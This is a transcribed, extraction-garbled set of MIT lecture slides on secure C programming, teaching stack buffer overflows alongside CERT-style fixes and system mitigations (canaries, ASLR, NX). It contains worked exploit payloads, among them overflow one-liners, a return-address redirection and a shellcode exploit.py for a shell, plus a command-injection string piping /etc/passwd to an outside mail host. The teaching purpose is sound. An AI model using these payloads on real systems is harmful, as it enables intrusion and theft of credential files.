Secure Programming In C - Massachusetts Institute Of Technology
1y ago
35 Views
1 Downloads
548.40 KB
68 Pages
Report/dmca
Download PDF

Transcription

Secure Programming in CLef IoannidisMIT EECSJanuary 5, 2014Lef IoannidisHow to secure your stack for fun and profitMIT EECS

IntroductionsMeJunior at MIT, course 6.2. Interested in Computer Security,Operating Systems, Distributed Computing and SystemAdministration.YouComputer programmers with knowledge in C and Systems,can read assembly, interested in writing secure code.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Vulnerability statistics over the years (NIST)Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Lecture RoadmapWhat we will cover:Example attacks and exploits.C-specific prevention & mitigation.System-wide prevention & mitigation.Target: GNU/Linux systems.CC: GCC 4.4.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Case study: the notorious buffer overflowA buffer overflow example.Figure : From Wikimedia commons, buffer overflow basic example.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Memory Management: Linuxhttp://duartes.org/gustavo/blog/Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Vulnerable code1#i n c l u d e s t r i n g . h 23#d e f i n e g o o d P a s s ”GOODPASS”4567i n t main ( ) {c h a r p a s s I s G o o d 0 ;char buf [ 8 0 ] ;8p r i n t f ( ” E n t e r p a s s w o r d : \ n” ) ;gets ( buf ) ;91011i f ( s t r c m p ( buf , g o o d P a s s ) 0)p a s s I s G o o d 1 ;i f ( p a s s I s G o o d 1 )p r i n t f ( ”You win ! \ n” ) ;1213141516}Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Our first exploit/bin/bash python -c " print ’x’*80 ’\x01’ " ./test1Enter password:You win! courierLef IoannidisHow to secure your stack for fun and profitMIT EECS

Our first exploit/bin/bash python -c " print ’x’*80 ’\x01’ " ./test1Enter password:You win! courierLine 10: gets(buf);“Never use gets().” - GNU Man pages(3), gets()Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Secure version of previous code12#i n c l u d e s t r i n g . h #i n c l u d e s t d i o . h 345#d e f i n e g o o d P a s s ”GOODPASS”#d e f i n e STRSIZE 806789i n t main ( ) {c h a r p a s s I s G o o d 0 ;c h a r b u f [ STRSIZE 1] ;10p r i n t f ( ” E n t e r p a s s w o r d : \ n” ) ;f g e t s ( buf , STRSIZE , s t d i n ) ;111213i f ( s t r n c m p ( buf , goodPass , STRSIZE) 0)p a s s I s G o o d 1 ;i f ( p a s s I s G o o d 1 )p r i n t f ( ”You win ! \ n” ) ;1415161718}Lef IoannidisHow to secure your stack for fun and profitMIT EECS

The stack: LinuxDowd, McDonald, Schuh-The art of software security assesment,fig: 5.3Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Stack frames: CHow functions are pushed in the stack:1234void function ( int a , int b , int c ) {char buffer1 [ 5 ] ;char buffer2 [ 1 0 ] ;}5678v o i d main ( ) {function (1 ,2 ,3) ;}Aleph One - Smashing the stack for fun and profitLef IoannidisHow to secure your stack for fun and profitMIT EECS

Stack frames: x86 assembly12345678910111213141516171819function :pushlmovlsublleaveret.size. g l o b l main.typemain :pushlmovlsublmovlmovlmovlcallleaveret%ebp%esp , %ebp 16 , %e s pf u n c t i o n , . f u n c t i o nmain , @ f u n c t i o n%ebp%esp , %ebp 12 , %e s p 3 , 8(% e s p ) 2 , 4(% e s p ) 1 , (% e s p )functionLef IoannidisHow to secure your stack for fun and profitMIT EECS

Stack operations to call function12345sublmovlmovlmovlcall 12 , %e s p 3 , 8(% e s p ) 2 , 4(% e s p ) 1 , (% e s p )function3 sizeof(int) 12 bytes.Note: The arguments are in reverse order because the Linuxstack grows down.Call will push the IP in the stack.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Stack operations to call function12345sublmovlmovlmovlcall 12 , %e s p 3 , 8(% e s p ) 2 , 4(% e s p ) 1 , (% e s p )function1234function :p u s h l %ebpmovl %esp , %ebps u b l 16 , %e s pPushes the base pointer (EBP) in the stack, now it’s a savedframe pointer (SFP).Moves the stack pointer (ESP) in EBP, substituting theprevious address.Subtracts space for the local variables from ESP.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Smashing the stackUsing buffer overflow to overwrite a return address.Figures: http://skyrooks.ruLef IoannidisHow to secure your stack for fun and profitMIT EECS

Cool exercise: stack4.c123i n t main ( ) {int cookie ;char buf [ 8 0 ] ;4p r i n t f ( ” b u f : %08x c o o k i e : %08x \n” , &buf , &c o o k i e ) ;gets ( buf ) ;567i f ( c o o k i e 0 x 0 0 0 a 0 d 0 0 )p r i n t f ( ” you win ! \ n” ) ;8910}http://community.corest.com/ gera/InsecureProgramming/Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Cool exercise: stack4.c123i n t main ( ) {int cookie ;char buf [ 8 0 ] ;4p r i n t f ( ” b u f : %08x c o o k i e : %08x \n” , &buf , &c o o k i e ) ;gets ( buf ) ;567i f ( c o o k i e 0 x 0 0 0 a 0 d 0 0 )p r i n t f ( ” you win ! \ n” ) ;8910}Still uses gets(), so it is vulnerable to buffer overflow.0x000a0d00 { NULL, new line, carriage return, NULL }Impossible to write 0x000a0d00 to cookie because all thesebytes trigger gets() to stop reading characters.We need to redirect program flow to printf(“You win\n”);Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Overwriting the EIP123i n t main ( ) {int cookie ;char buf [ 8 0 ] ;4p r i n t f ( ” b u f : %08x c o o k i e : %08x \n” , &buf , &c o o k i e ) ;gets ( buf ) ;567i f ( c o o k i e 0 x 0 0 0 a 0 d 0 0 )p r i n t f ( ” you win ! \ n” ) ;8910}When a function is called it imediatelly pushes the EIP intothe stack (SFP).After it is complete a ret instruction pops the stack andmoves SFP back to EIP.Trick: Overwrite the SFP, while it’s in the stack.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Exploiting stack#4.c/bin/bash gdb stack4(gdb) rStarting program: stack4buf: bffff58c cookie: aaaaaaaaaa.Program received signal SIGSEGV, Segmentation fault.0x61616161 in ? () courierEIP is overwritten! 0x61616161 “aaaa”Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Now let’s disassemble main()12345678910111213141516171819200 x 08 0 4 84 2 40 x 08 0 4 84 2 50 x 08 0 4 84 2 70 x0804842a0 x0804842d0 x 08 0 4 84 3 10 x 08 0 4 84 3 50 x 08 0 4 84 3 90 x0804843d0 x 08 0 4 84 4 40 x 08 0 4 84 4 90 x0804844d0 x 08 0 4 84 5 00 x 08 0 4 84 5 50 x 08 0 4 84 5 90 x0804845e0 x 08 0 4 84 6 00 x 08 0 4 84 6 70 x0804846c0 x0804846d main 0 : pu sh main 1 : mov main 3 : and main 6 : s u b main 9 : l e a main 13 : mov main 17 : l e a main 21 : mov main 25 : movl main 32 : c a l l main 37 : l e a main 41 : mov main 44 : c a l l main 49 : mov main 53 : cmp main 58 : j n e main 60 : movl main 67 : c a l l main 72 : l e a v e main 73 : r e tLef IoannidisHow to secure your stack for fun and profit%ebp%esp ,% ebp 0 x f f f f f f f 0 ,% e s p 0x70 ,% e s p0 x 6 c(% e s p ) ,% e a x%eax , 0 x8(% e s p )0 x 1 c(% e s p ) ,% e a x%eax , 0 x4(% e s p ) 0x8048530 ,(% e s p )0 x8048350 p r i n t f @ p l t 0 x 1 c(% e s p ) ,% e a x%eax ,(% e s p )0 x8048330 g e t s @ p l t 0 x 6 c(% e s p ) ,% e a x 0xa0d00 ,% e a x0 x 8 0 4 8 4 6 c main 72 0x8048548 ,(% e s p )0 x8048360 p u t s @ p l t MIT EECS

Registers/bin/gdb stack4(gdb) b *0x0804846d(gdb) rStarting program: stack4buf: bffff58c cookie: bffff5dcaaaaaaaaaaaaaaaaBreakpoint 1, 0x0804846d in main () at stack4.c:13(gdb) info registerseax0xb7fc8ff4 -1208184844ecx0xbffff58c -1073744500edx0xb7fca334 -1208179916ebx0xb7fc8ff4 -1208184844esp0xbffff5ec 0xbffff5ecebp0xbffff668 0xbffff668esi0x0 0edi0x0 0eip0x804846d 0x804846d main 73 courierLef IoannidisHow to secure your stack for fun and profitMIT EECS

We have everything we needbuf: bffff58cesp: 0xbffff5ec 0xbffff5ec12340 x 08 0 4 84 5 90 x0804845e0 x 08 0 4 84 6 00 x 08 0 4 84 6 7 main 53 : main 58 : main 60 : main 67 :cmpjnemovlcall 0xa0d00 ,% e a x0 x 8 0 4 8 4 6 c main 72 0x8048548 ,(% e s p )0 x8048360 p u t s @ p l t 0xbffff5ec 0xbffff58c 0x00000060 96 bytes we need to overflow.Jump to: 0x08048460Linux Reverse stack \x60\x84\x04\x08Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Payload: Control Flow Redirection/bin/bash python -c ’’print ’a’ * 96 ’\x60\x84\x04\x08’ ’’ ./test1buf: bffff58c cookie: bffff5dcyou win!Segmentation fault courierLef IoannidisHow to secure your stack for fun and profitMIT EECS

Payload: Getting shellexploit.py#!/usr/bin/env pythonshellcode f\xff/bin/sh’courierprint shellcode ’\x90’ * 51 ’\x5c\xb3\x04\x08’/bin/bash - Got shell! python exploit.py ./stack4buf: bffff58c cookie: bffff5dc courierLef IoannidisHow to secure your stack for fun and profitMIT EECS

Other Attacks- Off-by-one exploitsCommon programming mistake when computing array boundaries.In little endian architectures this can result in overwriting the leastsignificant byte.Apache off-by-one bug 2007, sudo off-by-one bug 2008 etc.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Other Attacks- Return-to-libcSimilar in principal to a buffer overflow but instead of executingarbitrary shellcode you call functions from libc.so.Works when a noexec stack is enforced.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Other Attacks- Heap OverflowTaking advantage of libc bugs to take over dynamicaly allocatedmemory, or even the memory allocator itself. Many 0-day exploitsnowdays are heap overflows.He who controls the allocator, controls the system! - AnonymousLef IoannidisHow to secure your stack for fun and profitMIT EECS

More informationThe Phrack magazine. (http://www.phrack.org)The Defcon Conference. (http://www.defcon.org)LL CTF, MIT SEC seminars. (http://llctf.mit.edu)Next: C-specific prevention & mitigationLef IoannidisHow to secure your stack for fun and profitMIT EECS

Secure your code: CERT secure coding standardsStandards for C, C and Java (some still underdevelopment).Managed string library.Real world examples of insecure code.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Learning by the coutner-example of othersBad code examples will help you learn how to write secure codeand prevent:Security HolesUndefined beheaviourObscurityErrorsLef IoannidisHow to secure your stack for fun and profitMIT EECS

String null termination errors#1123i n t main ( i n t a r g c , c h a r a r g v [ ] ) {char cmdline [4096] ;c m d l i n e [ 0 ] ’ \0 ’ ;4f o r ( i n t i 1 ; i a r g c ; i ) {s t r c a t ( cmdline , argv [ i ] ) ;s t r c a t ( cmdline , ” ” ) ;}/ . . . /return 0 ;567891011}Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Compliant code1234567891011121314151617181920i n t main ( i n t a r g c , c h a r a r g v [ ] ) {size t bufsize 0;size t buflen 0 ;c h a r c m d l i n e NULL ;f o r ( i n t i 1 ; i a r g c ; i ) {const s i z e t len s t r l e n ( argv [ i ] ) ;i f ( b u f s i z e b u f l e n l e n ) {bufsize ( bufsize len ) 2 ;cmdline r e a l l o c ( cmdline , b u f s i z e ) ;i f (NULL c m d l i n e )return 1 ;/ r e a l l o c f a i l u r e /}memcpy ( c m d l i n e b u f l e n , a r g v [ i ] , l e n ) ;b u f l e n l e n ;c m d l i n e [ b u f l e n ] ’ ’ ;}c m d l i n e [ b u f l e n ] ’ \0 ’ ;/ . . . /f r e e ( cmdline ) ;return 0 ;}21Lef IoannidisHow to secure your stack for fun and profitMIT EECS

String null termination errors#21c h a r b u f [ BUFSIZ ] ;2345i f ( g e t s ( b u f ) NULL) {/ H a n d l e E r r o r /}Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Compliant code123c h a r b u f [ BUFFERSIZE ] ;i n t ch ;c h a r p ;4567891011121314151617181920i f ( f g e t s ( buf , s i z e o f ( b u f ) , s t d i n ) ) {/ f g e t s s u c c e e d s , s c a n f o r n e w l i n e c h a r a c t e r /p s t r c h r ( buf , ’ \n ’ ) ;i f (p) p ’ \0 ’ ;else {/ n e w l i n e n o t found , f l u s h s t d i n t o end o f l i n e /w h i l e ( ( ( ch g e t c h a r ( ) ) ! ’ \n ’ )&& ! f e o f ( s t d i n )&& ! f e r r o r ( s t d i n ));}}else {/ f g e t s f a i l e d , h a n d l e e r r o r /}Lef IoannidisHow to secure your stack for fun and profitMIT EECS

String null termination errors#31234char s t r i n g d a t a ;char a [ 1 6 ] ;/ . . . /strncpy (a , string data ,Lef IoannidisHow to secure your stack for fun and profits i z e o f (a )) ;MIT EECS

Compliant solution:12c h a r s t r i n g d a t a NULL ;char a [ 1 6 ] ;34/ . . . /567891011121314i f ( s t r i n g d a t a NULL) {/ H a n d l e n u l l p o i n t e r e r r o r /}e l s e i f ( s t r l e n ( s t r i n g d a t a ) s i z e o f ( a ) ) {/ H a n d l e o v e r l o n g s t r i n g e r r o r /}else {strcpy (a , string data ) ;}Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Passing strings to complex subsystems12s p r i n t f ( b u f f e r , ” / b i n / m a i l %s /tmp/ e m a i l ” , a d d r ) ;system ( b u f f e r ) ;Viega, John, & Messier, Matt. Secure Programming Cookbook for C and C : Recipes for Cryptography,Authentication, Networking, Input Validation & More.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Passing strings to complex subsystems12s p r i n t f ( b u f f e r , ” / b i n / m a i l %s /tmp/ e m a i l ” , a d d r ) ;system ( b u f f e r ) ;What if:bogus@addr.com; cat /etc/passwd mail somebadguy.netViega, John, & Messier, Matt. Secure Programming Cookbook for C and C : Recipes for Cryptography,Authentication, Networking, Input Validation & More.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Compliant solution: Whitelisting1234567891011s t a t i c char ok chars [ ] ” abcdefghijklmnopqrstuvwxyz ””ABCDEFGHIJKLMNOPQRSTUVWXYZ”” 1234567890 .@ ” ;c h a r u s e r d a t a [ ] ”Bad c h a r 1 : } Bad c h a r 2 : { ” ;c h a r cp u s e r d a t a ; / c u r s o r i n t o s t r i n g /c o n s t c h a r end u s e r d a t a s t r l e n ( u s e r d a t a ) ;f o r ( cp s t r s p n ( cp , o k c h a r s ) ;cp ! end ;cp s t r s p n ( cp , o k c h a r s ) ) { cp ’ ’ ;}Based on the tcp wrappers package written by Wietse VenemaLef IoannidisHow to secure your stack for fun and profitMIT EECS

Off-by-one errorsCan you find all the off-by-one errors?12345678910i n t main ( i n t a r g c , c h a r a r g v [ ] ) {char source [ 1 0 ] ;s t r c p y ( s o u r c e , ” 0123456789 ” ) ;char d e s t ( char ) malloc ( s t r l e n ( s o u r c e ) ) ;f o r ( i n t i 1 ; i 1 1 ; i ) {dest [ i ] source [ i ] ;}d e s t [ i ] ’ \0 ’ ;p r i n t f ( ” d e s t %s ” , d e s t ) ;}Robert Seacord, CERT: Safer strings in CLef IoannidisHow to secure your stack for fun and profitMIT EECS

Integer overflow errors#1: Addition1u n s i g n e d i n t u i 1 , u i 2 , usum ;23/ I n i t i a l i z eu i 1 and u i 2 /45usum u i 1 u i 2 ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Compliant code1u n s i g n e d i n t u i 1 , u i 2 , usum ;23/ I n i t i a l i z eu i 1 and u i 2 /45678910i f (UINT MAX u i 1 u i 2 ) {/ h a n d l e e r r o r c o n d i t i o n /}else {usum u i 1 u i 2 ;}Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Integer overfloat errors#2: Subtraction1signed int si1 , si2 ,result ;23/ I n i t i a l i z es i 1 and s i 2 /45result si1 si2 ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Compliant code1signed int si1 , si2 ,result ;23/ I n i t i a l i z es i 1 and s i 2 /4567891011if( ( s i 2 0 && s i 1 INT MIN s i 2 ) ( s i 2 0 && s i 1 INT MAX s i 2 ) ) {/ h a n d l e e r r o r c o n d i t i o n /}else {result si1 si2 ;}Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Integer overfloat errors#3: Multiplication12signed int si1 , si2 ,result ;34/ . . . /56result si1 si2 ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Compliant code1signed int si1 , si2 ,result ;2345678910111213141516171819/ I n i t i a l i z e s i 1 and s i 2 /static assert (s i z e o f ( l o n g l o n g ) 2 s i z e o f ( i n t ) ,” Unable to d e t e c t o v e r f l o w a f t e r m u l t i p l i c a t i o n ”);s i g n e d l o n g l o n g tmp ( s i g n e d l o n g l o n g ) s i 1 ( signed long long ) s i 2 ;/ I f t h e p r o d u c t c a n n o t be r e p r e s e n t e d a s a 32 b i t i n t e g e r , h a n d l e a s an e r r o r c o n d i t i o n . /i f ( ( tmp INT MAX ) ( tmp INT MIN ) ) {/ h a n d l e e r r o r c o n d i t i o n /}else {r e s u l t ( i n t ) tmp ;}Lef IoannidisHow to secure your stack for fun and profitMIT EECS

GCC Preprocessor: Inlines VS macrosNon-compliant code123#d e f i n e CUBE(X) ( ( X) (X) (X ) )int i 2;i n t a 81 / CUBE( i ) ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS

GCC Preprocessor: Inlines VS macrosNon-compliant code123#d e f i n e CUBE(X) ( ( X) (X) (X ) )int i 2;i n t a 81 / CUBE( i ) ;Expands to:1i n t a 81 / (( i ) ( i ) ( i ) ) ; // U n d e f i n e d !Lef IoannidisHow to secure your stack for fun and profitMIT EECS

GCC Preprocessor: Inlines VS macrosNon-compliant code123#d e f i n e CUBE(X) ( ( X) (X) (X ) )int i 2;i n t a 81 / CUBE( i ) ;Expands to:1i n t a 81 / (( i ) ( i ) ( i ) ) ; // U n d e f i n e d !Compliant code12345i n l i n e i n t cube ( i n t i ) {return i i i ;}int i 2;i n t a 81 / c u b e( i ) ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Pointer arithmetic: Never for different arrays1234i n t nums [ SIZE ] ;c h a r s t r i n g s [ SIZE ] ;i n t n e x t n u m p t r nums ;int free bytes ;56/ i n c r e m e n t n e x t n u m p t r a s a r r a yf i l l s /78f r e e b y t e s s t r i n g s ( char ) next num ptr ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Compliant solution1234i n t nums [ SIZE ] ;c h a r s t r i n g s [ SIZE ] ;i n t n e x t n u m p t r nums ;int free bytes ;56/ i n c r e m e n t n e x t n u m p t r a s a r r a yf i l l s /78f r e e b y t e s (&( nums [ SIZE ] ) n e x t n u m p t r ) s i z e o f ( i n t ) ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS

GCC Preprocessor: inlines VS macrosNon-compliant code12#d e f i n e F ( x ) ( o p e r a t i o n s , c a l l s t o F , 2 x )#d e f i n e G( x ) ( o p e r a t i o n s , c a l l s t o G , x 1 )34y F ( x ) G( x ) ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS

GCC Preprocessor: inlines VS macrosNon-compliant code12#d e f i n e F ( x ) ( o p e r a t i o n s , c a l l s t o F , 2 x )#d e f i n e G( x ) ( o p e r a t i o n s , c a l l s t o G , x 1 )34y F ( x ) G( x ) ;The variable operations is both read and modified twice in thesame expression, so it can receive the wrong value.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Compliant code12345678910inline int f ( int x) { o p e r a t i o n s ; c a l l s t o f ;r e t u r n 2 x ;}inline int g( int x) { o p e r a t i o n s ; c a l l s t o g ;return x 1 ;}1112y f (x) g(x) ;Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Advanced techniques for securing your codeUsing secure libraries: Managed string library, Microsoftsecure string library, safeStr.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Advanced techniques for securing your codeUsing secure libraries: Managed string library, Microsoftsecure string library, safeStr.They provide alternatives to insecure standard C functions.(ie: safestrsafestrLef IoannidisHow to secure your stack for fun and cpy()strcmp()strlen()sprintf()vsprintf()MIT EECS

Advanced techniques for securing your codeCanariesTerminator: NULL, CR, LF, -1. Weak because the canary isknown.Random: Generating random bytes in the end of buffer duringruntime.Random XOR: Random canaries XOR scrambled with all orparts of the control data.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Protecting your SystemWˆX protection, the data section on the stack is flagged asnot executable and the program memory as not writable.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Protecting your SystemWˆX protection, the data section on the stack is flagged asnot executable and the program memory as not writable.ASLR: Address space layout randomization. Randomlyallocate shared libraries, stack and heap.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Protecting your SystemWˆX protection, the data section on the stack is flagged asnot executable and the program memory as not writable.ASLR: Address space layout randomization. Randomlyallocate shared libraries, stack and heap.Setting the NX bit: CPU support for flagging executable andnon-executable data. Reduces overhead for WˆX.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Protecting your SystemWˆX protection, the data section on the stack is flagged asnot executable and the program memory as not writable.ASLR: Address space layout randomization. Randomlyallocate shared libraries, stack and heap.Setting the NX bit: CPU support for flagging executable andnon-executable data. Reduces overhead for WˆX.iOS5: CSE: Code Signing Enforcement. Signing eachexecutable memory page and checking the CS VALID flag.Prevents changes in executable code during runtime.Lef IoannidisHow to secure your stack for fun and profitMIT EECS

ExamplesPaX on LinuxLef IoannidisHow to secure your stack for fun and profitMIT EECS

ExamplesPaX on LinuxOpenBSD kernelLef IoannidisHow to secure your stack for fun and profitMIT EECS

ExamplesPaX on LinuxOpenBSD kernelHardened GentooLef IoannidisHow to secure your stack for fun and profitMIT EECS

ExamplesPaX on LinuxOpenBSD kernelHardened GentoogrsecurityLef IoannidisHow to secure your stack for fun and profitMIT EECS

ExamplesPaX on LinuxOpenBSD kernelHardened GentoogrsecurityMicrosoft Windows Server 2008 R2Lef IoannidisHow to secure your stack for fun and profitMIT EECS

That’s all!Thank you. Questions?Lef IoannidisHow to secure your stack for fun and profitMIT EECS

Stack operations to call function 1 subl 12 , %esp 2 movl 3 , 8(%esp) 3 movl 2 , 4(%esp) 4 movl 1 , (%esp) 5 c a l lfunction 1 function : 2 pushl %ebp 3 movl %esp, %ebp 4 subl 16 , %esp Pushes the base pointer (EBP) in the stack, now it's a saved frame pointer (SFP). Moves the stack pointer (ESP) in EBP, substituting the

Related Books

DESIGNING SECURE IOT DEVICES STARTS WITH A SECURE

DESIGNING SECURE IOT DEVICES STARTS WITH A SECURE

Managing Security with SAP Solution Manager

Managing Security with SAP Solution Manager

Programming Manual NC Programming - Siemens

Programming Manual NC Programming - Siemens

Product Guide 2021 - Radio Programming Made Easy!

Product Guide 2021 - Radio Programming Made Easy!

3000M CNC Programming and Operations Manual for Three

3000M CNC Programming and Operations Manual for Three

Principles of Software Programming: Structured and OOP .

Principles of Software Programming: Structured and OOP .

Programming Languages Overview & Syntax

Programming Languages Overview & Syntax

Method Unified modeling of gene duplication, loss, and .

Method Unified modeling of gene duplication, loss, and .

Transforming Learning with New Technologies

Transforming Learning with New Technologies

The Introduction of Black Locust (Robinia pseudoacacia L .

The Introduction of Black Locust (Robinia pseudoacacia L .

Men’s Mental Health in Massachusetts (PowerPoint) (pdf)

Men’s Mental Health in Massachusetts (PowerPoint) (pdf)

2020-2021 MIT Architecture, Art, and Design Undergraduate .

2020-2021 MIT Architecture, Art, and Design Undergraduate .

PopularTags

Recent Views